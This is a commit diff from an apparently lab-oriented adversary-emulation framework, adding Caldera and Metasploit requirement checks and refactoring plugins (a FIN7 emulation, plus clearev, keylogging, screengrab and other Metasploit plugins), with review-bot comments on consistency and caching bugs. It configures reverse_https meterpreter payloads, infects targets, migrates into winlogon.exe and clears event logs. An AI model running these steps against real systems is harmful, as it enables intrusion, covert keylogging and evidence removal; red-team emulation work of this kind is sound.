Simplifying Metasploit. Fixing stuff and adding requirement for plugins

pull/12/head
Thorsten Sick 3 years ago
parent f9e9b59f56
commit 76a1c210eb

@ -3,11 +3,19 @@
import os
from plugins.base.plugin_base import BasePlugin
from app.exceptions import PluginError, ConfigurationError
from app.exceptions import PluginError, ConfigurationError, RequirementError
from app.calderacontrol import CalderaControl
# from app.metasploit import MSFVenom, Metasploit
from typing import Optional
from plugins.base.machinery import MachineryPlugin
from app.metasploit import MetasploitInstant
from enum import Enum
class Requirement(Enum):
""" Requirements for this plugin """
METASPLOIT = 1
CALDERA = 2
class AttackPlugin(BasePlugin):
@ -23,6 +31,8 @@ class AttackPlugin(BasePlugin):
required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker
required_files_target: list[str] = [] # a list of files to automatically copy to the targets
requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin
# TODO: parse results
def __init__(self):
@ -38,6 +48,25 @@ class AttackPlugin(BasePlugin):
self.metasploit_user: str = "user"
self.metasploit = None
def needs_caldera(self) -> bool:
""" Returns True if this plugin has Caldera in the requirements """
if Requirement.CALDERA in self.requirements:
return True
return False
def needs_metasploit(self) -> bool:
""" Returns True if this plugin has Metasploit in the requirements """
if Requirement.METASPLOIT in self.requirements:
return True
return False
def connect_metasploit(self):
""" Inits metasploit """
if self.needs_metasploit():
self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
# If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception
def copy_to_attacker_and_defender(self):
""" Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """
@ -103,7 +132,9 @@ class AttackPlugin(BasePlugin):
@param caldera: The caldera object to connect through
"""
self.caldera = caldera
if self.needs_caldera():
self.caldera = caldera
def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs):
""" Attack a single target using caldera
@ -113,6 +144,9 @@ class AttackPlugin(BasePlugin):
@param parameters: parameters to pass to the ability
"""
if not self.needs_caldera():
raise RequirementError("Caldera not in requirements")
self.caldera.attack(paw=target.get_paw(),
ability_id=ability_id,
group=target.get_group(),
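Review bot: connect_metasploit() returns silently when Requirement.METASPLOIT is not declared, so a plugin that forgot the requirement fails later with an AttributeError on `None` instead of the RequirementError that caldera_attack() raises for the Caldera case. If connect_metasploit() is only called by plugins that intend to use Metasploit, adding `else: raise RequirementError("Metasploit not in requirements")` would make the two gates consistent and surface the misconfiguration at the call site. Separately, `requirements` is annotated `Optional[...]`, but needs_caldera() and needs_metasploit() test `in self.requirements`, which raises TypeError when a subclass sets it to None. Either drop the Optional or test `in (self.requirements or [])`. caldera_attack's body continues outside the hunk.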

@ -3,7 +3,7 @@
# Adversary emulation for FIN7
import socket
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
from app.metasploit import MSFVenom, MetasploitInstant
import os
@ -20,6 +20,8 @@ class FIN7Plugin(AttackPlugin):
required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA, Requirement.METASPLOIT]
######
payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage
@ -33,14 +35,15 @@ class FIN7Plugin(AttackPlugin):
@param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
"""
if self.metasploit_1:
return self.metasploit_1
if self.metasploit:
return self.metasploit
self.connect_metasploit()
self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
self.metasploit_1.wait_for_session()
return self.metasploit_1
self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
self.metasploit.wait_for_session()
return self.metasploit
def step1(self):
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1)
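Review bot: The early return `if self.metasploit: return self.metasploit` treats a connected client as one whose handler stub is already running and whose session exists, but `self.metasploit` is now the shared base-class attribute that connect_metasploit() assigns before either step runs. If connect_metasploit() was called earlier on this plugin, or start_exploit_stub_for_external_payload() or wait_for_session() raised on a previous call, the next call hands back a client without a session. A separate flag set only after `wait_for_session()` returns, for example `self._session_ready = True`, tested in place of `self.metasploit`, would keep the cache accurate. The enclosing method starts outside the hunk.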

@ -38,7 +38,8 @@ class MetasploitClearevPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target)
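Review bot: This smart_infect() call spells out the full argument set (`outfile=payload_name`, `format="exe"`, `architecture="x64"`), and the same edit is repeated verbatim in the Getuid, Keylogging, Ps, Screengrab and Sysinfo plugins. The rendering has lost the +/- markers, but the hunk counts suggest `payload_name=` was renamed to `outfile=`, which is the kind of signature change that then has to be chased through every plugin. smart_infect() is defined outside this page, so this is a suggestion only: giving it defaults for `format` and `architecture`, or adding one helper on AttackPlugin that the plugins call, would leave a single place to change next time. It would also ensure that every plugin builds its payload file the same way.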

@ -38,7 +38,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
uid = metasploit.getuid(target)

@ -38,7 +38,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, name="winlogon.exe")

@ -38,7 +38,8 @@ class MetasploitPsPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.ps_process_discovery(target)

@ -38,7 +38,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")

@ -38,8 +38,9 @@ class MetasploitSysinfoPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
architecture="x86")
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target)
print(f"Sysinfo: {si}")
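Review bot: Besides the `outfile`/`format` change shared with the other plugins, this call appears to switch `architecture` from `"x86"` to `"x64"`, which the commit title does not mention. `payload_type` is assigned outside the hunk, so it is not visible whether it is an x64 payload. If it is still a 32-bit one, the generated executable and the handler would disagree, and the sysinfo step would fail without an obvious cause. A comment next to the call such as `# payload_type must be an x64 payload to match architecture` would document the coupling.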
